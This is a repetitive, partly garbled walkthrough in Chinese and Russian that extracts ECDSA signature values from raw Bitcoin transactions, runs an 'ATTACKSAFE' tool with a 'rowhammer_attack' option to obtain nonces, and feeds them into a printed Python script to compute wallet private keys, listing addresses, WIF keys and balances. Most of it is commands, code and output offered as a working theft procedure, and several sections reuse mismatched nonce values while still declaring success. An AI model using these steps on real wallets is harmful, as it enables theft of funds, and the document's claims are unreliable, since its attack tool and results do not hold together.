RawTX = 010000000188e589b8eed21964cb26cbdf6c396d00eeafa9e3647c9127cbdb23140952aa5b2d0000006b483045022100ddf8c20bb701221daa1a16b69d448bd9582a9051889c0ba71d73930b61876bab02200d66649db3f3a1b7c28984f4d08d41496ffc8488b6e35e4f2b4abdd6bdfc88050121031702d9ec2144df3030e65465bb96d651ea18c56c90215f4835d86e03d797091affffffff01d0020000000000001976a914e94a23147d57674a7b817197be14877853590e6e88ac00000000
現在我們需要從所有易受攻擊的交易中獲取所有的 R、S、Z 值
讓我們使用 breakECDSA.py 腳本
python2 breakECDSA.py 010000000188e589b8eed21964cb26cbdf6c396d00eeafa9e3647c9127cbdb23140952aa5b2d0000006b483045022100ddf8c20bb701221daa1a16b69d448bd9582a9051889c0ba71d73930b61876bab02200d66649db3f3a1b7c28984f4d08d41496ffc8488b6e35e4f2b4abdd6bdfc88050121031702d9ec2144df3030e65465bb96d651ea18c56c90215f4835d86e03d797091affffffff01d0020000000000001976a914e94a23147d57674a7b817197be14877853590e6e88ac00000000

R = 0xddf8c20bb701221daa1a16b69d448bd9582a9051889c0ba71d73930b61876bab
S = 0x0d66649db3f3a1b7c28984f4d08d41496ffc8488b6e35e4f2b4abdd6bdfc8805
Z = 0xf01bdd08bc326304be4dece37d9b9069959f0f8e20dbd14b840849271042ab17
要從易受攻擊的 ECDSA 簽名交易中獲取密鑰,讓我們將數據添加RawTX
到文本文檔並將其保存為文件RawTX.txt
010000000188e589b8eed21964cb26cbdf6c396d00eeafa9e3647c9127cbdb23140952aa5b2d0000006b483045022100ddf8c20bb701221daa1a16b69d448bd9582a9051889c0ba71d73930b61876bab02200d66649db3f3a1b7c28984f4d08d41496ffc8488b6e35e4f2b4abdd6bdfc88050121031702d9ec2144df3030e65465bb96d651ea18c56c90215f4835d86e03d797091affffffff01d0020000000000001976a914e94a23147d57674a7b817197be14877853590e6e88ac00000000
-tool rowhammer_attack
使用軟件啟動“ATTACKSAFE SOFTWARE”
./attacksafe -tool rowhammer_attack -open RawTX.txt -save SecretKey.txt

我們發起了這次攻擊-tool rowhammer_attack
並將結果保存到一個文件中SecretKey.txt
現在看到成功的結果,打開文件SecretKey.txt
cat SecretKey.txt

Deployments ECDSA:
SecretKey = 0x786a67462e7cfaee1fb5b583518d3f47d750dbf34e9a4434625232cb05cb7efe
RawTX = 010000000188e589b8eed21964cb26cbdf6c396d00eeafa9e3647c9127cbdb23140952aa5b2d0000006b483045022100ddf8c20bb701221daa1a16b69d448bd9582a9051889c0ba71d73930b61876bab02200d66649db3f3a1b7c28984f4d08d41496ffc8488b6e35e4f2b4abdd6bdfc88050121031702d9ec2144df3030e65465bb96d651ea18c56c90215f4835d86e03d797091affffffff01d0020000000000001976a914e94a23147d57674a7b817197be14877853590e6e88ac00000000
我們看到一個銘文"Deployments ECDSA"
,表示比特幣區塊鏈交易中存在嚴重漏洞。
SecretKey значение в формате HEX, это и есть наш секретный ключ "K" (NONCE):
K = 0x786a67462e7cfaee1fb5b583518d3f47d750dbf34e9a4434625232cb05cb7efe
讓我們用Python腳本檢查一下point2gen.py
讓我們使用ECPy橢圓曲線庫:
現在讓我們通過指定運行腳本 секретный ключ "K" (NONCE)
:
python3 point2gen.py 0x786a67462e7cfaee1fb5b583518d3f47d750dbf34e9a4434625232cb05cb7efe

(0xddf8c20bb701221daa1a16b69d448bd9582a9051889c0ba71d73930b61876bab , 0x4dd4a6ea5041635a29cafaeb019dce1848cab62c5b638dd235c3177f361f0911)
EC (secp256k1)
檢查具有簽名值的點的坐標R
R = 0xddf8c20bb701221daa1a16b69d448bd9582a9051889c0ba71d73930b61876bab
S = 0x0d66649db3f3a1b7c28984f4d08d41496ffc8488b6e35e4f2b4abdd6bdfc8805
Z = 0xf01bdd08bc326304be4dece37d9b9069959f0f8e20dbd14b840849271042ab17
R = 0xddf8c20bb701221daa1a16b69d448bd9582a9051889c0ba71d73930b61876bab
point2gen = (0xddf8c20bb701221daa1a16b69d448bd9582a9051889c0ba71d73930b61876bab , 0x4dd4a6ea5041635a29cafaeb019dce1848cab62c5b638dd235c3177f361f0911)
ВСЕ ВЕРНО!
K = 0x786a67462e7cfaee1fb5b583518d3f47d750dbf34e9a4434625232cb05cb7efe
現在知道了密鑰,我們可以得到比特幣錢包的私鑰:14jUzNgdAboyaUaWNxbDJYYAKwHSwwj6sP
讓我們使用 Python腳本: calculate.py
> > > 獲取私鑰
讓我們打開代碼並添加簽名的所有值K, R, S, Z
def h(n):
return hex(n).replace("0x","")
def extended_gcd(aa, bb):
lastremainder, remainder = abs(aa), abs(bb)
x, lastx, y, lasty = 0, 1, 1, 0
while remainder:
lastremainder, (quotient, remainder) = remainder, divmod(lastremainder, remainder)
x, lastx = lastx - quotient*x, x
y, lasty = lasty - quotient*y, y
return lastremainder, lastx * (-1 if aa < 0 else 1), lasty * (-1 if bb < 0 else 1)
def modinv(a, m):
g, x, y = extended_gcd(a, m)
if g != 1:
raise ValueError
return x % m
N = 0xfffffffffffffffffffffffffffffffebaaedce6af48a03bbfd25e8cd0364141
K = 0x786a67462e7cfaee1fb5b583518d3f47d750dbf34e9a4434625232cb05cb7efe
R = 0xddf8c20bb701221daa1a16b69d448bd9582a9051889c0ba71d73930b61876bab
S = 0x0d66649db3f3a1b7c28984f4d08d41496ffc8488b6e35e4f2b4abdd6bdfc8805
Z = 0xf01bdd08bc326304be4dece37d9b9069959f0f8e20dbd14b840849271042ab17
print (h((((S * K) - Z) * modinv(R,N)) % N))
該腳本將使用以下公式計算私鑰:
Privkey = ((((S * K) - Z) * modinv(R,N)) % N)
讓我們運行腳本:
python3 calculate.py

PrivKey = cdd7729ab894ba334e9a9b55c6bdb8c7e5869c80339ca6bb0ae23faee6af550b
讓我們打開bitaddress並檢查:
ADDR: 14jUzNgdAboyaUaWNxbDJYYAKwHSwwj6sP
WIF: L47qg9KCcGYw1WkVKGA6EH6mAdMoD5WwXCT4Gyn8UxLGPbZ14AUz
HEX: cdd7729ab894ba334e9a9b55c6bdb8c7e5869c80339ca6bb0ae23faee6af550b

Приватный ключ найден!

www.blockchain.com/btc/address/14jUzNgdAboyaUaWNxbDJYYAKwHSwwj6sP
BALANCE: $ 698.45
丟失 BTC 硬幣的潛在威脅在於比特幣區塊鏈交易的嚴重漏洞,因此我們強烈建議大家始終更新軟件並僅使用經過驗證的設備。
通過詳細的密碼分析,我們還在7de3c41e439bbab837602019e17611d6fe9d245bcb1f182add148fc35fc42e8f中發現了一個針對相同比特幣地址的嚴重漏洞 TXID:
為攻擊準備 RawTX
14jUzNgdAboyaUaWNxbDJYYAKwHSwwj6sP

RawTX = 0100000001e4c6502d4648cd1ae5f2783fe4e8ba449257f0a38b0f8b061ec1cd53e4ba2ade040000006a47304402200a5a38731e8947d567cd82302b8a3a9546215f044ca98b89ea162334bebf781902204eb5aae65c917b18ae6af2b2449bb0ec8c8af4e02c0f68aabba7f509b06c5e390121031702d9ec2144df3030e65465bb96d651ea18c56c90215f4835d86e03d797091affffffff01a8020000000000001976a914e94a23147d57674a7b817197be14877853590e6e88ac00000000
現在我們需要從所有易受攻擊的交易中獲取所有的 R、S、Z 值
讓我們使用 breakECDSA.py 腳本
python2 breakECDSA.py 0100000001e4c6502d4648cd1ae5f2783fe4e8ba449257f0a38b0f8b061ec1cd53e4ba2ade040000006a47304402200a5a38731e8947d567cd82302b8a3a9546215f044ca98b89ea162334bebf781902204eb5aae65c917b18ae6af2b2449bb0ec8c8af4e02c0f68aabba7f509b06c5e390121031702d9ec2144df3030e65465bb96d651ea18c56c90215f4835d86e03d797091affffffff01a8020000000000001976a914e94a23147d57674a7b817197be14877853590e6e88ac00000000

R = 0x0a5a38731e8947d567cd82302b8a3a9546215f044ca98b89ea162334bebf7819
S = 0x4eb5aae65c917b18ae6af2b2449bb0ec8c8af4e02c0f68aabba7f509b06c5e39
Z = 0xade80ed6e0d32f4cf2ad36e7f2b28e3f0d421de70310d8726f7dd8a2580936a8
要從易受攻擊的 ECDSA 簽名交易中獲取密鑰,讓我們將數據添加RawTX
到文本文檔並將其保存為文件RawTX.txt
0100000001e4c6502d4648cd1ae5f2783fe4e8ba449257f0a38b0f8b061ec1cd53e4ba2ade040000006a47304402200a5a38731e8947d567cd82302b8a3a9546215f044ca98b89ea162334bebf781902204eb5aae65c917b18ae6af2b2449bb0ec8c8af4e02c0f68aabba7f509b06c5e390121031702d9ec2144df3030e65465bb96d651ea18c56c90215f4835d86e03d797091affffffff01a8020000000000001976a914e94a23147d57674a7b817197be14877853590e6e88ac00000000
-tool rowhammer_attack
使用軟件啟動“ATTACKSAFE SOFTWARE”
./attacksafe -tool rowhammer_attack -open RawTX.txt -save SecretKey.txt

我們發起了這次攻擊-tool rowhammer_attack
並將結果保存到一個文件中SecretKey.txt
現在看到成功的結果,打開文件SecretKey.txt
cat SecretKey.txt

Deployments ECDSA:
SecretKey = 0x326428d5b16a180127f67d9dbce5a500e572bf8ff5d7a8840b9704f8bea8fd9c
RawTX = 0100000001e4c6502d4648cd1ae5f2783fe4e8ba449257f0a38b0f8b061ec1cd53e4ba2ade040000006a47304402200a5a38731e8947d567cd82302b8a3a9546215f044ca98b89ea162334bebf781902204eb5aae65c917b18ae6af2b2449bb0ec8c8af4e02c0f68aabba7f509b06c5e390121031702d9ec2144df3030e65465bb96d651ea18c56c90215f4835d86e03d797091affffffff01a8020000000000001976a914e94a23147d57674a7b817197be14877853590e6e88ac00000000
我們看到一個銘文"Deployments ECDSA"
,表示比特幣區塊鏈交易中存在嚴重漏洞。
SecretKey значение в формате HEX, это и есть наш секретный ключ "K" (NONCE):
K = 0x786a67462e7cfaee1fb5b583518d3f47d750dbf34e9a4434625232cb05cb7efe
讓我們用Python腳本檢查一下point2gen.py
讓我們使用ECPy橢圓曲線庫:
現在讓我們通過指定運行腳本 секретный ключ "K" (NONCE)
:
python3 point2gen.py 0x326428d5b16a180127f67d9dbce5a500e572bf8ff5d7a8840b9704f8bea8fd9c

(0x0a5a38731e8947d567cd82302b8a3a9546215f044ca98b89ea162334bebf7819 , 0x21ef3da06220ca412f63e331d3ad52effee2b6afe4bcbba76380f30abbf91f5b)
EC (secp256k1)
檢查具有簽名值的點的坐標R
R = 0x0a5a38731e8947d567cd82302b8a3a9546215f044ca98b89ea162334bebf7819
S = 0x4eb5aae65c917b18ae6af2b2449bb0ec8c8af4e02c0f68aabba7f509b06c5e39
Z = 0xade80ed6e0d32f4cf2ad36e7f2b28e3f0d421de70310d8726f7dd8a2580936a8
R = 0x0a5a38731e8947d567cd82302b8a3a9546215f044ca98b89ea162334bebf7819
point2gen = (0x0a5a38731e8947d567cd82302b8a3a9546215f044ca98b89ea162334bebf7819 , 0x21ef3da06220ca412f63e331d3ad52effee2b6afe4bcbba76380f30abbf91f5b)
ВСЕ ВЕРНО!
K = 0x326428d5b16a180127f67d9dbce5a500e572bf8ff5d7a8840b9704f8bea8fd9c
現在知道了密鑰,我們可以得到比特幣錢包的私鑰:14jUzNgdAboyaUaWNxbDJYYAKwHSwwj6sP
讓我們使用 Python腳本: calculate.py
> > > 獲取私鑰
讓我們打開代碼並添加簽名的所有值K, R, S, Z
def h(n):
return hex(n).replace("0x","")
def extended_gcd(aa, bb):
lastremainder, remainder = abs(aa), abs(bb)
x, lastx, y, lasty = 0, 1, 1, 0
while remainder:
lastremainder, (quotient, remainder) = remainder, divmod(lastremainder, remainder)
x, lastx = lastx - quotient*x, x
y, lasty = lasty - quotient*y, y
return lastremainder, lastx * (-1 if aa < 0 else 1), lasty * (-1 if bb < 0 else 1)
def modinv(a, m):
g, x, y = extended_gcd(a, m)
if g != 1:
raise ValueError
return x % m
N = 0xfffffffffffffffffffffffffffffffebaaedce6af48a03bbfd25e8cd0364141
K = 0x326428d5b16a180127f67d9dbce5a500e572bf8ff5d7a8840b9704f8bea8fd9c
R = 0x0a5a38731e8947d567cd82302b8a3a9546215f044ca98b89ea162334bebf7819
S = 0x4eb5aae65c917b18ae6af2b2449bb0ec8c8af4e02c0f68aabba7f509b06c5e39
Z = 0xade80ed6e0d32f4cf2ad36e7f2b28e3f0d421de70310d8726f7dd8a2580936a8
print (h((((S * K) - Z) * modinv(R,N)) % N))
該腳本將使用以下公式計算私鑰:
Privkey = ((((S * K) - Z) * modinv(R,N)) % N)
讓我們運行腳本:
python3 calculate.py

PrivKey = cdd7729ab894ba334e9a9b55c6bdb8c7e5869c80339ca6bb0ae23faee6af550b
讓我們打開bitaddress並檢查:
ADDR: 14jUzNgdAboyaUaWNxbDJYYAKwHSwwj6sP
WIF: L47qg9KCcGYw1WkVKGA6EH6mAdMoD5WwXCT4Gyn8UxLGPbZ14AUz
HEX: cdd7729ab894ba334e9a9b55c6bdb8c7e5869c80339ca6bb0ae23faee6af550b

Приватный ключ найден!

www.blockchain.com/btc/address/14jUzNgdAboyaUaWNxbDJYYAKwHSwwj6sP
BALANCE: $ 698.45
№4
通過詳細的密碼分析,我們還發現了比特幣地址中的一個嚴重漏洞:
17xFf85Y8YGsRsgSjCN4KfBKXTjpSnDBxc


為攻擊準備 RawTX
17xFf85Y8YGsRsgSjCN4KfBKXTjpSnDBxc

RawTX = 010000000161d00e5c5d90528fb69e727a481638d109b011c0944e17e21b4a8b06de7086ba1400000069463043021f057a78c3377aa63c69a6b8f85f86ba5ce433198bba2a3f91c64da614952fb702200707ef040813d2693a50dd7458bbf07c07ff28e2233a3adeb81120898d7ee4cd0121027625d44b04d7760766b280d683d3495a0532fd8e931e48cc546bf794286a9defffffffff01d0020000000000001976a914e94a23147d57674a7b817197be14877853590e6e88ac00000000
現在我們需要從所有易受攻擊的交易中獲取所有的 R、S、Z 值
讓我們使用 breakECDSA.py 腳本
python2 breakECDSA.py 010000000161d00e5c5d90528fb69e727a481638d109b011c0944e17e21b4a8b06de7086ba1400000069463043021f057a78c3377aa63c69a6b8f85f86ba5ce433198bba2a3f91c64da614952fb702200707ef040813d2693a50dd7458bbf07c07ff28e2233a3adeb81120898d7ee4cd0121027625d44b04d7760766b280d683d3495a0532fd8e931e48cc546bf794286a9defffffffff01d0020000000000001976a914e94a23147d57674a7b817197be14877853590e6e88ac00000000

R = 0x00057a78c3377aa63c69a6b8f85f86ba5ce433198bba2a3f91c64da614952fb7
S = 0x0707ef040813d2693a50dd7458bbf07c07ff28e2233a3adeb81120898d7ee4cd
Z = 0x6b260e8163bb2a68f5dea232134c0f2ceefe242564dba90632b72b10e0a3a91e
要從易受攻擊的 ECDSA 簽名交易中獲取密鑰,讓我們將數據添加RawTX
到文本文檔並將其保存為文件RawTX.txt
010000000161d00e5c5d90528fb69e727a481638d109b011c0944e17e21b4a8b06de7086ba1400000069463043021f057a78c3377aa63c69a6b8f85f86ba5ce433198bba2a3f91c64da614952fb702200707ef040813d2693a50dd7458bbf07c07ff28e2233a3adeb81120898d7ee4cd0121027625d44b04d7760766b280d683d3495a0532fd8e931e48cc546bf794286a9defffffffff01d0020000000000001976a914e94a23147d57674a7b817197be14877853590e6e88ac00000000
-tool rowhammer_attack
使用軟件啟動“ATTACKSAFE SOFTWARE”
./attacksafe -tool rowhammer_attack -open RawTX.txt -save SecretKey.txt

我們發起了這次攻擊-tool rowhammer_attack
並將結果保存到一個文件中SecretKey.txt
現在看到成功的結果,打開文件SecretKey.txt
cat SecretKey.txt

Deployments ECDSA:
SecretKey = 0xe83de16640c70e103fd24d2e10535896054861ba444f659ea17d953490821820
RawTX = 010000000161d00e5c5d90528fb69e727a481638d109b011c0944e17e21b4a8b06de7086ba1400000069463043021f057a78c3377aa63c69a6b8f85f86ba5ce433198bba2a3f91c64da614952fb702200707ef040813d2693a50dd7458bbf07c07ff28e2233a3adeb81120898d7ee4cd0121027625d44b04d7760766b280d683d3495a0532fd8e931e48cc546bf794286a9defffffffff01d0020000000000001976a914e94a23147d57674a7b817197be14877853590e6e88ac00000000
我們看到一個銘文"Deployments ECDSA"
,表示比特幣區塊鏈交易中存在嚴重漏洞。
SecretKey значение в формате HEX, это и есть наш секретный ключ "K" (NONCE):
K = 0xe83de16640c70e103fd24d2e10535896054861ba444f659ea17d953490821820
讓我們用Python腳本檢查一下point2gen.py
讓我們使用ECPy橢圓曲線庫:
現在讓我們通過指定運行腳本 секретный ключ "K" (NONCE)
:
python3 point2gen.py 0xe83de16640c70e103fd24d2e10535896054861ba444f659ea17d953490821820

(0x00057a78c3377aa63c69a6b8f85f86ba5ce433198bba2a3f91c64da614952fb7 , 0xce504e53221559f480af279f313f5f4913f6b8c317561e570290e3b1b6da0a94)
EC (secp256k1)
檢查具有簽名值的點的坐標R
R = 0x00057a78c3377aa63c69a6b8f85f86ba5ce433198bba2a3f91c64da614952fb7
S = 0x0707ef040813d2693a50dd7458bbf07c07ff28e2233a3adeb81120898d7ee4cd
Z = 0x6b260e8163bb2a68f5dea232134c0f2ceefe242564dba90632b72b10e0a3a91e
R = 0x00057a78c3377aa63c69a6b8f85f86ba5ce433198bba2a3f91c64da614952fb7
point2gen = (0x00057a78c3377aa63c69a6b8f85f86ba5ce433198bba2a3f91c64da614952fb7 , 0xce504e53221559f480af279f313f5f4913f6b8c317561e570290e3b1b6da0a94)
ВСЕ ВЕРНО!
K = 0xe83de16640c70e103fd24d2e10535896054861ba444f659ea17d953490821820
現在知道了密鑰,我們可以得到比特幣錢包的私鑰:17xFf85Y8YGsRsgSjCN4KfBKXTjpSnDBxc
讓我們使用 Python腳本: calculate.py
> > > 獲取私鑰
讓我們打開代碼並添加簽名的所有值K, R, S, Z
def h(n):
return hex(n).replace("0x","")
def extended_gcd(aa, bb):
lastremainder, remainder = abs(aa), abs(bb)
x, lastx, y, lasty = 0, 1, 1, 0
while remainder:
lastremainder, (quotient, remainder) = remainder, divmod(lastremainder, remainder)
x, lastx = lastx - quotient*x, x
y, lasty = lasty - quotient*y, y
return lastremainder, lastx * (-1 if aa < 0 else 1), lasty * (-1 if bb < 0 else 1)
def modinv(a, m):
g, x, y = extended_gcd(a, m)
if g != 1:
raise ValueError
return x % m
N = 0xfffffffffffffffffffffffffffffffebaaedce6af48a03bbfd25e8cd0364141
K = 0xe83de16640c70e103fd24d2e10535896054861ba444f659ea17d953490821820
R = 0x00057a78c3377aa63c69a6b8f85f86ba5ce433198bba2a3f91c64da614952fb7
S = 0x0707ef040813d2693a50dd7458bbf07c07ff28e2233a3adeb81120898d7ee4cd
Z = 0x6b260e8163bb2a68f5dea232134c0f2ceefe242564dba90632b72b10e0a3a91e
print (h((((S * K) - Z) * modinv(R,N)) % N))
該腳本將使用以下公式計算私鑰:
Privkey = ((((S * K) - Z) * modinv(R,N)) % N)
讓我們運行腳本:
python3 calculate.py

PrivKey = e9f6fc4dea68373f7e91348a23086d406621c1af6b7c0f085fb3096f5ae6b5cf
讓我們打開bitaddress並檢查:
ADDR: 17xFf85Y8YGsRsgSjCN4KfBKXTjpSnDBxc
WIF: L54WQgCucvc7HCQvYSKnKgiqMUXXXvPxEYZbpxFWTeqQQTuAsqhH
HEX: e9f6fc4dea68373f7e91348a23086d406621c1af6b7c0f085fb3096f5ae6b5cf

Приватный ключ найден!

www.blockchain.com/btc/address/17xFf85Y8YGsRsgSjCN4KfBKXTjpSnDBxc
BALANCE: $ 679.53
丟失 BTC 硬幣的潛在威脅在於比特幣區塊鏈交易的嚴重漏洞,因此我們強烈建議大家始終更新軟件並僅使用經過驗證的設備。
通過詳細的密碼分析,我們還在17ea9403f628a1810ffa70858dd5411c455fbdc1fd8c7e2048c5e5ae5d2ac839中發現了一個針對相同比特幣地址的嚴重漏洞 TXID:
為攻擊準備 RawTX
17xFf85Y8YGsRsgSjCN4KfBKXTjpSnDBxc

RawTX = 010000000178dc582ecec1c896cefa5c8207ef549ed7e052f386328530eec78869764bbaa21f0000006b483045022100cb620734c986b2f5ef6d3dbaa72baec6ceb153590553d15c28f57fc809e0c36802205b4f85e04379ca7fc4d48bbf4ed5a204eba9459bcfe042c4fb10f13c76fe87200121027625d44b04d7760766b280d683d3495a0532fd8e931e48cc546bf794286a9defffffffff013a020000000000001976a91464c2de8847e1ab5f767ae5ab8253d7522572ddf888ac00000000
現在我們需要從所有易受攻擊的交易中獲取所有的 R、S、Z 值
讓我們使用 breakECDSA.py 腳本
python2 breakECDSA.py 010000000178dc582ecec1c896cefa5c8207ef549ed7e052f386328530eec78869764bbaa21f0000006b483045022100cb620734c986b2f5ef6d3dbaa72baec6ceb153590553d15c28f57fc809e0c36802205b4f85e04379ca7fc4d48bbf4ed5a204eba9459bcfe042c4fb10f13c76fe87200121027625d44b04d7760766b280d683d3495a0532fd8e931e48cc546bf794286a9defffffffff013a020000000000001976a91464c2de8847e1ab5f767ae5ab8253d7522572ddf888ac00000000

R = 0xcb620734c986b2f5ef6d3dbaa72baec6ceb153590553d15c28f57fc809e0c368
S = 0x5b4f85e04379ca7fc4d48bbf4ed5a204eba9459bcfe042c4fb10f13c76fe8720
Z = 0x5a6c8e71ff1d29ebf721320d373808f66ede9303e09e3715b3e85ce57b92b7c8
要從易受攻擊的 ECDSA 簽名交易中獲取密鑰,讓我們將數據添加RawTX
到文本文檔並將其保存為文件RawTX.txt
010000000178dc582ecec1c896cefa5c8207ef549ed7e052f386328530eec78869764bbaa21f0000006b483045022100cb620734c986b2f5ef6d3dbaa72baec6ceb153590553d15c28f57fc809e0c36802205b4f85e04379ca7fc4d48bbf4ed5a204eba9459bcfe042c4fb10f13c76fe87200121027625d44b04d7760766b280d683d3495a0532fd8e931e48cc546bf794286a9defffffffff013a020000000000001976a91464c2de8847e1ab5f767ae5ab8253d7522572ddf888ac00000000
-tool rowhammer_attack
使用軟件啟動“ATTACKSAFE SOFTWARE”
./attacksafe -tool rowhammer_attack -open RawTX.txt -save SecretKey.txt

我們發起了這次攻擊-tool rowhammer_attack
並將結果保存到一個文件中SecretKey.txt
現在看到成功的結果,打開文件SecretKey.txt
cat SecretKey.txt

Deployments ECDSA:
SecretKey = 0x5cdc6820f6336951f2d9f55b544ed2337804ddaa38249f53e7fc7b176ae67a2a
RawTX = 010000000178dc582ecec1c896cefa5c8207ef549ed7e052f386328530eec78869764bbaa21f0000006b483045022100cb620734c986b2f5ef6d3dbaa72baec6ceb153590553d15c28f57fc809e0c36802205b4f85e04379ca7fc4d48bbf4ed5a204eba9459bcfe042c4fb10f13c76fe87200121027625d44b04d7760766b280d683d3495a0532fd8e931e48cc546bf794286a9defffffffff013a020000000000001976a91464c2de8847e1ab5f767ae5ab8253d7522572ddf888ac00000000
我們看到一個銘文"Deployments ECDSA"
,表示比特幣區塊鏈交易中存在嚴重漏洞。
SecretKey значение в формате HEX, это и есть наш секретный ключ "K" (NONCE):
K = 0xe83de16640c70e103fd24d2e10535896054861ba444f659ea17d953490821820
讓我們用Python腳本檢查一下point2gen.py
讓我們使用ECPy橢圓曲線庫:
現在讓我們通過指定運行腳本 секретный ключ "K" (NONCE)
:
python3 point2gen.py 0x5cdc6820f6336951f2d9f55b544ed2337804ddaa38249f53e7fc7b176ae67a2a

(0xcb620734c986b2f5ef6d3dbaa72baec6ceb153590553d15c28f57fc809e0c368 , 0x37b895600595d773ef80780fadfb81f34ab997aafdee272e1baf1b199df853a3)
EC (secp256k1)
檢查具有簽名值的點的坐標R
R = 0xcb620734c986b2f5ef6d3dbaa72baec6ceb153590553d15c28f57fc809e0c368
S = 0x5b4f85e04379ca7fc4d48bbf4ed5a204eba9459bcfe042c4fb10f13c76fe8720
Z = 0x5a6c8e71ff1d29ebf721320d373808f66ede9303e09e3715b3e85ce57b92b7c8
R = 0xcb620734c986b2f5ef6d3dbaa72baec6ceb153590553d15c28f57fc809e0c368
point2gen = (0xcb620734c986b2f5ef6d3dbaa72baec6ceb153590553d15c28f57fc809e0c368 , 0x37b895600595d773ef80780fadfb81f34ab997aafdee272e1baf1b199df853a3)
ВСЕ ВЕРНО!
K = 0x5cdc6820f6336951f2d9f55b544ed2337804ddaa38249f53e7fc7b176ae67a2a
現在知道了密鑰,我們可以得到比特幣錢包的私鑰:17xFf85Y8YGsRsgSjCN4KfBKXTjpSnDBxc
讓我們使用 Python腳本: calculate.py
> > > 獲取私鑰
讓我們打開代碼並添加簽名的所有值K, R, S, Z
def h(n):
return hex(n).replace("0x","")
def extended_gcd(aa, bb):
lastremainder, remainder = abs(aa), abs(bb)
x, lastx, y, lasty = 0, 1, 1, 0
while remainder:
lastremainder, (quotient, remainder) = remainder, divmod(lastremainder, remainder)
x, lastx = lastx - quotient*x, x
y, lasty = lasty - quotient*y, y
return lastremainder, lastx * (-1 if aa < 0 else 1), lasty * (-1 if bb < 0 else 1)
def modinv(a, m):
g, x, y = extended_gcd(a, m)
if g != 1:
raise ValueError
return x % m
N = 0xfffffffffffffffffffffffffffffffebaaedce6af48a03bbfd25e8cd0364141
K = 0x5cdc6820f6336951f2d9f55b544ed2337804ddaa38249f53e7fc7b176ae67a2a
R = 0xcb620734c986b2f5ef6d3dbaa72baec6ceb153590553d15c28f57fc809e0c368
S = 0x5b4f85e04379ca7fc4d48bbf4ed5a204eba9459bcfe042c4fb10f13c76fe8720
Z = 0x5a6c8e71ff1d29ebf721320d373808f66ede9303e09e3715b3e85ce57b92b7c8
print (h((((S * K) - Z) * modinv(R,N)) % N))
該腳本將使用以下公式計算私鑰:
Privkey = ((((S * K) - Z) * modinv(R,N)) % N)
讓我們運行腳本:
python3 calculate.py

PrivKey = e9f6fc4dea68373f7e91348a23086d406621c1af6b7c0f085fb3096f5ae6b5cf
讓我們打開bitaddress並檢查:
ADDR: 17xFf85Y8YGsRsgSjCN4KfBKXTjpSnDBxc
WIF: L54WQgCucvc7HCQvYSKnKgiqMUXXXvPxEYZbpxFWTeqQQTuAsqhH
HEX: e9f6fc4dea68373f7e91348a23086d406621c1af6b7c0f085fb3096f5ae6b5cf

Приватный ключ найден!

www.blockchain.com/btc/address/17xFf85Y8YGsRsgSjCN4KfBKXTjpSnDBxc
BALANCE: $ 679.53
№5
通過詳細的密碼分析,我們還發現了比特幣地址中的一個嚴重漏洞:
18vXv21kk8PfN4KRX5i19QvDRM855qheQ


為攻擊準備 RawTX
18vXv21kk8PfN4KRX5i19QvDRM855qheQ

RawTX = 010000000179b9169d7436b95206053986e843b69d8e8235933a126e597c2dd7cdc6a07ed8060000006b483045022100c5c2d551da92885687072c21288451cac237778ccad971dba929cedbb57fd93502200cc3cfec36e8e9df751438ea3486d868f1ce6fb4b05540fe724b8e8f652743400121024feffc562717f5780235775c775d79b278d74dad2ec8032c4a138c6177693c99ffffffff014e020000000000001976a914e94a23147d57674a7b817197be14877853590e6e88ac00000000
現在我們需要從所有易受攻擊的交易中獲取所有的 R、S、Z 值
讓我們使用 breakECDSA.py 腳本
python2 breakECDSA.py 010000000179b9169d7436b95206053986e843b69d8e8235933a126e597c2dd7cdc6a07ed8060000006b483045022100c5c2d551da92885687072c21288451cac237778ccad971dba929cedbb57fd93502200cc3cfec36e8e9df751438ea3486d868f1ce6fb4b05540fe724b8e8f652743400121024feffc562717f5780235775c775d79b278d74dad2ec8032c4a138c6177693c99ffffffff014e020000000000001976a914e94a23147d57674a7b817197be14877853590e6e88ac00000000

R = 0xc5c2d551da92885687072c21288451cac237778ccad971dba929cedbb57fd935
S = 0x0cc3cfec36e8e9df751438ea3486d868f1ce6fb4b05540fe724b8e8f65274340
Z = 0x6b709c60c5357b397ed916dd014b7ce92ead05508b173b45f20066d23c6720f6
要從易受攻擊的 ECDSA 簽名交易中獲取密鑰,讓我們將數據添加RawTX
到文本文檔並將其保存為文件RawTX.txt
010000000179b9169d7436b95206053986e843b69d8e8235933a126e597c2dd7cdc6a07ed8060000006b483045022100c5c2d551da92885687072c21288451cac237778ccad971dba929cedbb57fd93502200cc3cfec36e8e9df751438ea3486d868f1ce6fb4b05540fe724b8e8f652743400121024feffc562717f5780235775c775d79b278d74dad2ec8032c4a138c6177693c99ffffffff014e020000000000001976a914e94a23147d57674a7b817197be14877853590e6e88ac00000000
-tool rowhammer_attack
使用軟件啟動“ATTACKSAFE SOFTWARE”
./attacksafe -tool rowhammer_attack -open RawTX.txt -save SecretKey.txt

我們發起了這次攻擊-tool rowhammer_attack
並將結果保存到一個文件中SecretKey.txt
現在看到成功的結果,打開文件SecretKey.txt
cat SecretKey.txt

Deployments ECDSA:
SecretKey = 0xf8be8b1e7110c61a6904bb3eb3834c08ee1f18c56b6a04915e14306c1a8668be
RawTX = 010000000179b9169d7436b95206053986e843b69d8e8235933a126e597c2dd7cdc6a07ed8060000006b483045022100c5c2d551da92885687072c21288451cac237778ccad971dba929cedbb57fd93502200cc3cfec36e8e9df751438ea3486d868f1ce6fb4b05540fe724b8e8f652743400121024feffc562717f5780235775c775d79b278d74dad2ec8032c4a138c6177693c99ffffffff014e020000000000001976a914e94a23147d57674a7b817197be14877853590e6e88ac00000000
我們看到一個銘文"Deployments ECDSA"
,表示比特幣區塊鏈交易中存在嚴重漏洞。
SecretKey значение в формате HEX, это и есть наш секретный ключ "K" (NONCE):
K = 0xf8be8b1e7110c61a6904bb3eb3834c08ee1f18c56b6a04915e14306c1a8668be
讓我們用Python腳本檢查一下point2gen.py
讓我們使用ECPy橢圓曲線庫:
現在讓我們通過指定運行腳本 секретный ключ "K" (NONCE)
:
python3 point2gen.py 0xf8be8b1e7110c61a6904bb3eb3834c08ee1f18c56b6a04915e14306c1a8668be

(0xc5c2d551da92885687072c21288451cac237778ccad971dba929cedbb57fd935 , 0xb05023fec1068addab6d25f08d358e6f25edd83094ac730dcb7124ef3f662af7)
EC (secp256k1)
檢查具有簽名值的點的坐標R
R = 0xc5c2d551da92885687072c21288451cac237778ccad971dba929cedbb57fd935
S = 0x0cc3cfec36e8e9df751438ea3486d868f1ce6fb4b05540fe724b8e8f65274340
